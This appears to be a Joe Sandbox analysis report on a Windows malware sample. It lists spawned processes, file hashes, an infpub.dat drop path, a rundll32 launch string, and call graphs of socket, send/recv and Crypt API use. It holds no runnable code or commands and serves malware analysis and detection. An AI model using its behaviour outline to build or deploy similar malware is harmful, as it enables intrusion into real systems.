                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\cdd.dll
                                            Wow64 process (32bit):
                                            Commandline:
                                            Imagebase:
                                            File size:267'264 bytes
                                            MD5 hash:9B684213A399B4E286982BDAD6CF3D07
                                            Has elevated privileges:
                                            Has administrator privileges:
                                            Programmed in:C, C++ or other language
                                            Has exited:false

                                            Target ID:49
                                            Start time:02:18:57
                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\fontdrvhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:"fontdrvhost.exe"
                                            Imagebase:0x7ff6080a0000
                                            File size:827'408 bytes
                                            MD5 hash:BBCB897697B3442657C7D6E3EDDBD25F
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:50
                                            Start time:02:18:57
                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\LogonUI.exe
                                            Wow64 process (32bit):false
                                            Commandline:"LogonUI.exe" /flags:0x2 /state0:0xa3f8d855 /state1:0x41c64e6d
                                            Imagebase:0x7ff778710000
                                            File size:13'824 bytes
                                            MD5 hash:893144FE49AA16124B5BD3034E79BBC6
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:55
                                            Start time:02:18:59
                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\cdd.dll
                                            Wow64 process (32bit):
                                            Commandline:
                                            Imagebase:
                                            File size:267'264 bytes
                                            MD5 hash:9B684213A399B4E286982BDAD6CF3D07
                                            Has elevated privileges:
                                            Has administrator privileges:
                                            Programmed in:C, C++ or other language
                                            Has exited:false

                                            Target ID:56
                                            Start time:02:18:59
                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\fontdrvhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:"fontdrvhost.exe"
                                            Imagebase:0x7ff6080a0000
                                            File size:827'408 bytes
                                            MD5 hash:BBCB897697B3442657C7D6E3EDDBD25F
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true


                                              Execution Graph

                                              Execution Coverage:3.2%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:30.9%
                                              Total number of Nodes:81
                                              Total number of Limit Nodes:10

                                              Callgraph

                                              Control-flow Graph

                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,?,0000030C,?), ref: 005110F8
                                              • GetModuleFileNameW.KERNEL32(00000000), ref: 005110FF
                                                • Part of subcall function 00511000: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?), ref: 0051101A
                                                • Part of subcall function 00511000: GetFileSize.KERNEL32(00000000,00000000,?,?,?), ref: 0051102D
                                                • Part of subcall function 00511000: GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 0051103D
                                                • Part of subcall function 00511000: HeapAlloc.KERNEL32(00000000,?,?,?), ref: 00511044
                                                • Part of subcall function 00511000: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?), ref: 00511060
                                                • Part of subcall function 00511000: GetProcessHeap.KERNEL32(00000000,00000000,?,?), ref: 00511071
                                                • Part of subcall function 00511000: HeapFree.KERNEL32(00000000,?,?), ref: 00511078
                                                • Part of subcall function 00511000: CloseHandle.KERNEL32(00000000,?), ref: 00511080
                                              • GetProcessHeap.KERNEL32(00000000,?,?,00000000,?,?), ref: 00511172
                                              • HeapAlloc.KERNEL32(00000000,?,00000000,?,?), ref: 00511179
                                              • memcpy.MSVCRT ref: 00511192
                                              • GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?), ref: 005111BB
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 005111BE
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00511207
                                              • HeapFree.KERNEL32(00000000), ref: 0051120A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1253081484.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                              • Associated: 00000000.00000002.1253064080.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1253103847.0000000000514000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1253127728.0000000000519000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_510000_LisectAVT_2403002C_35.jbxd
                                              Similarity
                                              • API ID: Heap$Process$File$AllocFreeHandleModule$AllocateCloseCreateNameReadSizememcpy
                                              • String ID:
                                              • API String ID: 796136525-0
                                              • Opcode ID: 0271b003138481404f5a76131a2654fc2a725b6ff6b52acd045feb4cc2578a78
                                              • Instruction ID: 7d73f123d279d9b3726962f4ea2d14e7cb98a57e86c2eaa9a2fa023b9941620a
                                              • Opcode Fuzzy Hash: 0271b003138481404f5a76131a2654fc2a725b6ff6b52acd045feb4cc2578a78
                                              • Instruction Fuzzy Hash: 7A418471A016199BEB20DF65DC44AEABBB9FF9C700F0041D9EA059B241DB31DD94CFA4

                                              Control-flow Graph

                                              APIs
                                              • GetCommandLineW.KERNEL32 ref: 005112DF
                                              • GetCommandLineW.KERNEL32 ref: 005112FC
                                              • CommandLineToArgvW.SHELL32(00000000), ref: 005112FF
                                              • wcsstr.MSVCRT ref: 0051133D
                                              • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 0051139B
                                              • lstrcatW.KERNEL32(?,\rundll32.exe), ref: 005113B5
                                              • wsprintfW.USER32 ref: 00511418
                                              • CreateProcessW.KERNELBASE ref: 00511479
                                              • ExitProcess.KERNEL32 ref: 00511481
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1253081484.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                              • Associated: 00000000.00000002.1253064080.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1253103847.0000000000514000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1253127728.0000000000519000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_510000_LisectAVT_2403002C_35.jbxd
                                              Similarity
                                              • API ID: CommandLine$Process$ArgvCreateDirectoryExitSystemlstrcatwcsstrwsprintf
                                              • String ID: %ws C:\Windows\%ws,#1 %ws$D$\rundll32.exe$infpub.dat
                                              • API String ID: 39178828-1758013632
                                              • Opcode ID: be11fead9b998ef4514394135854fb5e76307b2ce9c5eac93fa78f71fae20222
                                              • Instruction ID: 2dd89dca1deae3204f41e4f600e058218ac9945c5dee02a861dd6d88e763c4e0
                                              • Opcode Fuzzy Hash: be11fead9b998ef4514394135854fb5e76307b2ce9c5eac93fa78f71fae20222
                                              • Instruction Fuzzy Hash: C841D3719006189BEB24DB94CC55BEA7778FF54740F0445D9EA06C7140EB709EA8CF64

                                              Control-flow Graph

                                              APIs
                                              • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?), ref: 0051101A
                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?), ref: 0051102D
                                              • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 0051103D
                                              • HeapAlloc.KERNEL32(00000000,?,?,?), ref: 00511044
                                              • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?), ref: 00511060
                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?), ref: 00511071
                                              • HeapFree.KERNEL32(00000000,?,?), ref: 00511078
                                              • CloseHandle.KERNEL32(00000000,?), ref: 00511080
                                              • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?), ref: 005110A4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1253081484.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                              • Associated: 00000000.00000002.1253064080.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1253103847.0000000000514000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1253127728.0000000000519000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_510000_LisectAVT_2403002C_35.jbxd
                                              Similarity
                                              • API ID: Heap$File$CloseProcess$AllocChangeCreateFindFreeHandleNotificationReadSize
                                              • String ID:
                                              • API String ID: 861328920-0
                                              • Opcode ID: a738f7529a707449a33e5f9b30c143a1a15d57e1f68b0e9933f43a575a4e298f
                                              • Instruction ID: 827b3820c4f1be6ac2f5bb5e74f4e660ab22fb9261a44913b6ed183d0234a881
                                              • Opcode Fuzzy Hash: a738f7529a707449a33e5f9b30c143a1a15d57e1f68b0e9933f43a575a4e298f
                                              • Instruction Fuzzy Hash: 1E218172A01214ABD7309BA6AC4CFDBBF6CFB5D762F104195FA0996240D7318984DBA0

                                              Control-flow Graph

                                              APIs
                                              • CreateFileW.KERNELBASE(C:\Windows\infpub.dat,40000000,00000000,00000000,00000002,00000000,00000000,00000000,?,?,005113F0,?,?,?), ref: 00511277
                                              • WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,005113F0,?,?,?), ref: 0051128F
                                              • FindCloseChangeNotification.KERNELBASE(00000000,?,005113F0,?,?,?), ref: 005112A4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1253081484.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                              • Associated: 00000000.00000002.1253064080.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1253103847.0000000000514000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1253127728.0000000000519000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_510000_LisectAVT_2403002C_35.jbxd
                                              Similarity
                                              • API ID: File$ChangeCloseCreateFindNotificationWrite
                                              • String ID: C:\Windows\infpub.dat
                                              • API String ID: 3805958096-2284094909
                                              • Opcode ID: d243838fcfe21efb444f4149697c9ad5d23d7994b506872abbf4ebf23e89e2d0
                                              • Instruction ID: 94a02c18a022f045638a55f67b7eae70731b13a700afb1e3ca0909734d59b487
                                              • Opcode Fuzzy Hash: d243838fcfe21efb444f4149697c9ad5d23d7994b506872abbf4ebf23e89e2d0
                                              • Instruction Fuzzy Hash: 59F08276A011147BE7205B57EC4CFD73E2CEBC67A1F008129FB14C6180D6705D85C6B4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1253081484.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                              • Associated: 00000000.00000002.1253064080.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1253103847.0000000000514000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1253127728.0000000000519000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_510000_LisectAVT_2403002C_35.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: invalid bit length repeat$invalid code lengths set$invalid distance code$invalid distance too far back$invalid literal/length code$too many length or distance symbols$|JQ$|JQ
                                              • API String ID: 0-3650201126
                                              • Opcode ID: 605b86085bb452d894c98525bb1c14ad5b4685413c2dd6951e5337057797049f
                                              • Instruction ID: 006a56f6baebb27ecbb287d1e49a3d0f6073e6a460ea18376eb4f7681eae9204
                                              • Opcode Fuzzy Hash: 605b86085bb452d894c98525bb1c14ad5b4685413c2dd6951e5337057797049f
                                              • Instruction Fuzzy Hash: AE624771E006159BDF18CF59C8906EDBBF2FF88300F1485AAD856AB386D7749A90CF90

                                              Control-flow Graph

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1253081484.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                              • Associated: 00000000.00000002.1253064080.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1253103847.0000000000514000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1253127728.0000000000519000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_510000_LisectAVT_2403002C_35.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Genu$ineI$invalid distance code$invalid distance too far back$invalid literal/length code$ntel
                                              • API String ID: 0-3089872807
                                              • Opcode ID: d7d2ae05a5d14cd36e8454229cd7d9b64a7fc8f78057d7ded9784fda44eabb42
                                              • Instruction ID: 417438e5c2bbfa2225c6af805b08de076177b0eb41157c486568199290f659c9
                                              • Opcode Fuzzy Hash: d7d2ae05a5d14cd36e8454229cd7d9b64a7fc8f78057d7ded9784fda44eabb42
                                              • Instruction Fuzzy Hash: CC121932A083458FEB15DE38C5A469ABFE1BF84354F148A2CE895D7B41D371DE88DB81
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1253081484.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                              • Associated: 00000000.00000002.1253064080.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1253103847.0000000000514000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1253127728.0000000000519000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_510000_LisectAVT_2403002C_35.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: header crc mismatch$unknown compression method$xIQ
                                              • API String ID: 0-3124641399
                                              • Opcode ID: 3f9c9e7498959f82cdda4dd080c3c3424cd163566438bfcc3f96182cfe9a505c
                                              • Instruction ID: cd69c0390eb06c99d94688dcb1338f81ef95f15aa76b89fdd20bf825efba78c9
                                              • Opcode Fuzzy Hash: 3f9c9e7498959f82cdda4dd080c3c3424cd163566438bfcc3f96182cfe9a505c
                                              • Instruction Fuzzy Hash: 7E425AB0A04605DFEF18CF59C484AAEBFF2BF88300F1485A9D9159B256D770DE90CB84

                                              Control-flow Graph

                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00511566
                                              • UnhandledExcep.KERNEL32(00514080), ref: 00511571
                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 0051157C
                                              • TerminateProcess.KERNEL32(00000000), ref: 00511583
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1253081484.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                              • Associated: 00000000.00000002.1253064080.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1253103847.0000000000514000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1253127728.0000000000519000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_510000_LisectAVT_2403002C_35.jbxd
                                              Similarity
                                              • API ID: ProcessUnhandled$CurrentExcepExceptionFilterTerminate
                                              • String ID:
                                              • API String ID: 1999905405-0
                                              • Opcode ID: 77ba04372209fee5f471bdcb39df6d51f95c32738a3eaeec80ffcb817a6559fc
                                              • Instruction ID: 02c79e317f77f28d0288c6f2865bbf999a1180f90767d3c88fd1750ffea82694
                                              • Opcode Fuzzy Hash: 77ba04372209fee5f471bdcb39df6d51f95c32738a3eaeec80ffcb817a6559fc
                                              • Instruction Fuzzy Hash: 4C21C7BA981204EBC360DF65FD886E43BB5BB3C354B10D019E90887320EB70598EEF59
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1253081484.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                              • Associated: 00000000.00000002.1253064080.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1253103847.0000000000514000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1253127728.0000000000519000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_510000_LisectAVT_2403002C_35.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7dc9f76d2ba4baf9a5b0ac0849eeea171e6263f4def31c7d3fbd81d3a968c81b
                                              • Instruction ID: b8c067a438b6c583a8e933823d9233770dc3a7992be42a287f629e8e83a73398
                                              • Opcode Fuzzy Hash: 7dc9f76d2ba4baf9a5b0ac0849eeea171e6263f4def31c7d3fbd81d3a968c81b
                                              • Instruction Fuzzy Hash: 287182317209419BDB18CF1EECD05A673A2F7ED34074AC538DA1687391C635EA2BDAD0

                                              Execution Graph

                                              Execution Coverage:22.2%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:26.6%
                                              Total number of Nodes:1415
                                              Total number of Limit Nodes:30
4bf676a 5382->5384 5384->5384 5385 4bf6775 EnterCriticalSection 5384->5385 5386 4bf6797 5385->5386 5387 4bf6792 5385->5387 5389 4bf67dd SetLastError 5386->5389 5390 4bf67bb StrCatW StrCatW 5386->5390 5401 4bf6628 5387->5401 5391 4bf67e5 LeaveCriticalSection 5389->5391 5390->5391 5391->5358 5393 4bf93aa WideCharToMultiByte WideCharToMultiByte inet_addr 5392->5393 5398 4bf943a 5392->5398 5394 4bf9403 WideCharToMultiByte 5393->5394 5395 4bf93f3 5393->5395 5417 4bf5337 GetProcessHeap HeapAlloc 5394->5417 5446 4bf9332 gethostbyname 5395->5446 5398->5357 5400->5382 5410 4bf686c 5401->5410 5403 4bf6722 5403->5386 5404 4bf6661 wsprintfW 5409 4bf6651 5404->5409 5405 4bf66ec StrCatW 5413 4bf6893 5405->5413 5406 4bf671a 5416 4bf6b46 GetProcessHeap HeapFree 5406->5416 5409->5403 5409->5404 5409->5405 5409->5406 5411 4bf6ced 7 API calls 5410->5411 5412 4bf6880 5411->5412 5412->5409 5414 4bf6d35 3 API calls 5413->5414 5415 4bf68a4 5414->5415 5415->5409 5416->5403 5418 4bf54fd 5417->5418 5419 4bf5365 rand 5417->5419 5418->5398 5420 4bf5398 rand socket 5419->5420 5421 4bf5391 5419->5421 5422 4bf54ed GetProcessHeap HeapFree 5420->5422 5423 4bf53c5 htons inet_addr connect 5420->5423 5421->5420 5422->5418 5424 4bf54d7 closesocket 5423->5424 5425 4bf5406 5423->5425 5424->5422 5449 4bf1ca3 GetProcessHeap RtlAllocateHeap 5425->5449 5431 4bf54c6 5514 4bf1dd1 GetProcessHeap HeapAlloc 5431->5514 5443 4bf54ac 5554 4bf516b 5443->5554 5447 4bf936f 5446->5447 5448 4bf9345 wsprintfA 5446->5448 5447->5394 5447->5398 5448->5447 5450 4bf1dc7 5449->5450 5451 4bf1cd3 GetProcessHeap HeapAlloc 5449->5451 5450->5424 5460 4bf2191 5450->5460 5452 4bf1ce6 htons send 5451->5452 5453 4bf1db5 GetProcessHeap HeapFree 5451->5453 5454 4bf1da5 GetProcessHeap HeapFree 5452->5454 5455 4bf1d30 recv 5452->5455 5453->5450 5454->5453 5455->5454 5456 4bf1d47 5455->5456 5456->5454 5579 4bf1c3a 5456->5579 5458 4bf1d5b 5458->5454 5587 4bf1747 5458->5587 5461 4bf1eb9 11 API calls 5460->5461 5462 4bf21a8 5461->5462 5463 
4bf2054 11 API calls 5462->5463 5464 4bf21d0 5462->5464 5463->5462 5464->5431 5465 4bf46c7 GetProcessHeap HeapAlloc 5464->5465 5466 4bf46fa 5465->5466 5467 4bf4aa4 5465->5467 5654 4bf2497 GetProcessHeap HeapAlloc 5466->5654 5501 4bf21dc GetProcessHeap HeapAlloc 5467->5501 5469 4bf471c 5470 4bf47b1 GetProcessHeap HeapFree 5469->5470 5471 4bf4741 5469->5471 5470->5467 5472 4bf4745 5471->5472 5479 4bf475a 5471->5479 5672 4bf2e12 GetProcessHeap HeapAlloc 5472->5672 5475 4bf4754 5475->5470 5707 4bf317c GetProcessHeap HeapAlloc 5475->5707 5477 4bf21dc 19 API calls 5477->5479 5479->5475 5479->5477 5480 4bf47ae 5479->5480 5481 4bf478a Sleep 5479->5481 5682 4bf29a2 GetProcessHeap HeapAlloc 5479->5682 5480->5470 5483 4bf2191 22 API calls 5481->5483 5482 4bf47e9 GetProcessHeap HeapAlloc 5482->5470 5484 4bf4802 5482->5484 5483->5479 5485 4bf480c GetProcessHeap HeapAlloc 5484->5485 5496 4bf486a 5484->5496 5487 4bf481d 5485->5487 5485->5496 5486 4bf49a6 GetProcessHeap HeapAlloc 5486->5496 5715 4bf3209 GetProcessHeap HeapAlloc 5487->5715 5488 4bf4888 Sleep GetProcessHeap HeapAlloc 5489 4bf4a91 GetProcessHeap HeapFree 5488->5489 5488->5496 5489->5470 5492 4bf4872 GetProcessHeap HeapFree 5492->5496 5494 4bf4a42 5733 4bf3680 GetProcessHeap HeapAlloc 5494->5733 5496->5486 5496->5488 5496->5489 5496->5492 5496->5494 5720 4bf32af GetProcessHeap HeapAlloc 5496->5720 5728 4bf33a4 GetProcessHeap HeapAlloc 5496->5728 5499 4bf4a86 5499->5489 5502 4bf233b 5501->5502 5503 4bf220b GetProcessHeap HeapAlloc 5501->5503 5502->5431 5523 4bf1eb9 GetProcessHeap HeapAlloc 5502->5523 5504 4bf232c GetProcessHeap HeapFree 5503->5504 5505 4bf2222 htons send 5503->5505 5504->5502 5506 4bf2263 recv 5505->5506 5507 4bf2320 GetProcessHeap HeapFree 5505->5507 5506->5507 5508 4bf227f 5506->5508 5507->5504 5508->5507 5509 4bf228c memset GetProcessHeap HeapAlloc 5508->5509 5509->5507 5510 4bf22b3 htons send 5509->5510 5511 4bf22e4 recv 5510->5511 5512 4bf2311 GetProcessHeap HeapFree 5510->5512 5511->5512 5513 
4bf22fc 5511->5513 5512->5507 5513->5512 5515 4bf1dff GetProcessHeap HeapAlloc 5514->5515 5516 4bf1eb0 5514->5516 5517 4bf1e9d GetProcessHeap HeapFree 5515->5517 5518 4bf1e13 htons send 5515->5518 5516->5424 5517->5516 5519 4bf1e8d GetProcessHeap HeapFree 5518->5519 5520 4bf1e54 recv 5518->5520 5519->5517 5520->5519 5521 4bf1e6d 5520->5521 5521->5519 5522 4bf1e73 memset 5521->5522 5522->5519 5524 4bf204b 5523->5524 5525 4bf1ee8 5523->5525 5524->5431 5534 4bf2054 GetProcessHeap HeapAlloc 5524->5534 5525->5525 5526 4bf1f07 GetProcessHeap HeapAlloc 5525->5526 5527 4bf1f2e htons 5526->5527 5528 4bf2038 GetProcessHeap HeapFree 5526->5528 5529 4bf1f79 send 5527->5529 5528->5524 5531 4bf1ffb recv 5529->5531 5532 4bf2028 GetProcessHeap HeapFree 5529->5532 5531->5532 5533 4bf2012 5531->5533 5532->5528 5533->5532 5535 4bf2188 5534->5535 5536 4bf2083 GetProcessHeap HeapAlloc 5534->5536 5535->5431 5545 4bf4ab5 5535->5545 5538 4bf20ab htons 5536->5538 5539 4bf2175 GetProcessHeap HeapFree 5536->5539 5540 4bf20d6 5538->5540 5539->5535 5540->5540 5541 4bf2127 send 5540->5541 5542 4bf213b recv 5541->5542 5543 4bf2165 GetProcessHeap HeapFree 5541->5543 5542->5543 5544 4bf2152 5542->5544 5543->5539 5544->5543 5546 4bf2054 11 API calls 5545->5546 5547 4bf4ad3 5546->5547 5548 4bf4b10 5547->5548 5549 4bf2f5a 12 API calls 5547->5549 5551 4bf4b45 5547->5551 5550 4bf2f5a 12 API calls 5548->5550 5549->5547 5552 4bf4b34 5550->5552 5551->5431 5551->5443 5552->5551 5553 4bf21dc 19 API calls 5552->5553 5553->5551 5555 4bf1eb9 11 API calls 5554->5555 5556 4bf518b 5555->5556 5557 4bf532d 5556->5557 5558 4bf2054 11 API calls 5556->5558 5557->5431 5559 4bf51ab 5558->5559 5559->5557 5862 4bf4e60 GetProcessHeap HeapAlloc 5559->5862 5562 4bf51c7 GetProcessHeap HeapAlloc 5562->5557 5563 4bf51e9 5562->5563 5871 4bf4f43 GetProcessHeap HeapAlloc 5563->5871 5566 4bf531f GetProcessHeap HeapFree 5566->5557 5567 4bf5201 GetProcessHeap HeapAlloc 5567->5566 5568 4bf5215 6 API calls 5567->5568 5569 4bf5311 
GetProcessHeap HeapFree 5568->5569 5570 4bf5261 sprintf 5568->5570 5569->5566 5881 4bf4b5d 5570->5881 5574 4bf5305 GetProcessHeap HeapFree 5574->5569 5580 4bf686c 7 API calls 5579->5580 5581 4bf1c5b 5580->5581 5582 4bf1c99 5581->5582 5583 4bf1747 54 API calls 5581->5583 5584 4bf1c93 5581->5584 5585 4bf6893 3 API calls 5581->5585 5582->5458 5583->5581 5632 4bf6b46 GetProcessHeap HeapFree 5584->5632 5585->5581 5588 4bf175a 5587->5588 5588->5588 5589 4bf1765 GetProcessHeap HeapAlloc 5588->5589 5590 4bf1c30 5589->5590 5591 4bf179b 5589->5591 5590->5458 5591->5591 5592 4bf17b1 CharUpperW 5591->5592 5593 4bf17be 5592->5593 5593->5593 5594 4bf17c9 GetProcessHeap HeapAlloc 5593->5594 5595 4bf17ec htons 5594->5595 5596 4bf1c22 GetProcessHeap HeapFree 5594->5596 5597 4bf184e 5595->5597 5596->5590 5597->5597 5598 4bf1859 send 5597->5598 5599 4bf1c16 GetProcessHeap HeapFree 5598->5599 5600 4bf1871 recv 5598->5600 5599->5596 5600->5599 5601 4bf1890 5600->5601 5601->5599 5602 4bf18d4 5601->5602 5603 4bf18d9 GetProcessHeap HeapAlloc 5601->5603 5602->5599 5603->5599 5604 4bf190a 5603->5604 5633 4bf15a7 GetProcessHeap HeapAlloc 5604->5633 5607 4bf1c08 GetProcessHeap HeapFree 5607->5599 5608 4bf15a7 16 API calls 5609 4bf1946 5608->5609 5609->5607 5610 4bf194e GetProcessHeap HeapAlloc 5609->5610 5611 4bf1bfa GetProcessHeap HeapFree 5610->5611 5612 4bf1968 5610->5612 5611->5607 5613 4bf1983 rand 5612->5613 5613->5613 5614 4bf1996 5613->5614 5615 4bf15a7 16 API calls 5614->5615 5616 4bf19ac 5615->5616 5617 4bf1bec GetProcessHeap HeapFree 5616->5617 5618 4bf19b4 GetProcessHeap HeapAlloc 5616->5618 5617->5611 5619 4bf1bde GetProcessHeap HeapFree 5618->5619 5620 4bf19c8 GetProcessHeap HeapAlloc 5618->5620 5619->5617 5622 4bf1a26 htons 5620->5622 5623 4bf1bc3 GetProcessHeap HeapFree 5620->5623 5624 4bf1a76 memcpy 5622->5624 5623->5619 5626 4bf1b57 send 5624->5626 5628 4bf1b84 recv 5626->5628 5629 4bf1bb3 GetProcessHeap HeapFree 5626->5629 5628->5629 5630 4bf1b9d memset 5628->5630 
5629->5623 5630->5629 5632->5582 5634 4bf173d 5633->5634 5635 4bf15f1 CryptAcquireContextW 5633->5635 5634->5607 5634->5608 5635->5634 5636 4bf1611 5635->5636 5637 4bf16be CryptCreateHash 5636->5637 5638 4bf1621 5636->5638 5640 4bf170b 5637->5640 5644 4bf16d4 5637->5644 5639 4bf1628 GetProcessHeap HeapAlloc 5638->5639 5638->5640 5639->5640 5643 4bf1642 CryptImportKey 5639->5643 5641 4bf1717 CryptDestroyHash 5640->5641 5642 4bf1720 5640->5642 5641->5642 5645 4bf172e 5642->5645 5646 4bf1725 CryptDestroyKey 5642->5646 5647 4bf16aa GetProcessHeap HeapFree 5643->5647 5648 4bf1678 CryptCreateHash 5643->5648 5644->5640 5649 4bf16de CryptHashData 5644->5649 5645->5634 5651 4bf1733 CryptReleaseContext 5645->5651 5646->5645 5647->5644 5648->5647 5652 4bf1692 CryptSetHashParam 5648->5652 5649->5640 5650 4bf16f2 CryptGetHashParam 5649->5650 5650->5640 5651->5634 5652->5647 5653 4bf16a6 5652->5653 5653->5647 5655 4bf26ff 5654->5655 5656 4bf24c5 GetProcessHeap HeapAlloc 5654->5656 5655->5469 5657 4bf26ec GetProcessHeap HeapFree 5656->5657 5658 4bf24dc rand htons 5656->5658 5657->5655 5659 4bf256f GetProcessHeap HeapAlloc 5658->5659 5660 4bf255f rand 5658->5660 5661 4bf26dc GetProcessHeap HeapFree 5659->5661 5662 4bf2590 htons 5659->5662 5660->5659 5660->5660 5661->5657 5663 4bf25cd rand 5662->5663 5663->5663 5664 4bf25dd GetProcessHeap HeapAlloc 5663->5664 5665 4bf25fe memcpy memcpy send 5664->5665 5666 4bf26cc GetProcessHeap HeapFree 5664->5666 5667 4bf26ba GetProcessHeap HeapFree 5665->5667 5668 4bf263a send 5665->5668 5666->5661 5667->5666 5668->5667 5670 4bf2653 5668->5670 5669 4bf2694 recv 5669->5670 5671 4bf269d 5669->5671 5670->5667 5670->5669 5670->5671 5671->5667 5673 4bf2e48 GetProcessHeap HeapAlloc 5672->5673 5674 4bf2f51 5672->5674 5675 4bf2f3e GetProcessHeap HeapFree 5673->5675 5676 4bf2e5c htons 5673->5676 5674->5475 5675->5674 5679 4bf2ed3 5676->5679 5677 4bf2ee7 send 5678 4bf2efd recv 5677->5678 5677->5679 5678->5679 5679->5677 5680 4bf2f2e GetProcessHeap 
